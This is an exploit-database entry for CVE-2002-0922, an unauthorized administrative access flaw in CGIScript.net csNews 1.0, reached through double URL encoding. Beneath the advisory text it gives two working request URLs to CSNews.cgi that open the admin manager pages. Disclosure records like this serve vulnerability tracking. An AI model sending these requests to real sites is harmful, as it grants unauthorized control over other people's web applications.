[] NeoSense
E X P L O I T S
title author type platform port cve id

CGIScript.net csNews 1.0 - Double URL Encoding Unauthorized Administrative Access

Author: Steve Gustin
type: webapps
platform: cgi
port: nan
date_added: 2002-06-11 
date_updated: 2012-09-26 
verified: 1 
codes: OSVDB-8135;CVE-2002-0922 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/4993/info

csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

Users with "public" access to the system may be able to view and modify some administration pages. This is accomplished by submitting a HTTP request in which some metacharacters are double URL encoded.


CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
CSNews.cgi?command=manage&database=default%2edb&mpage=manager
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.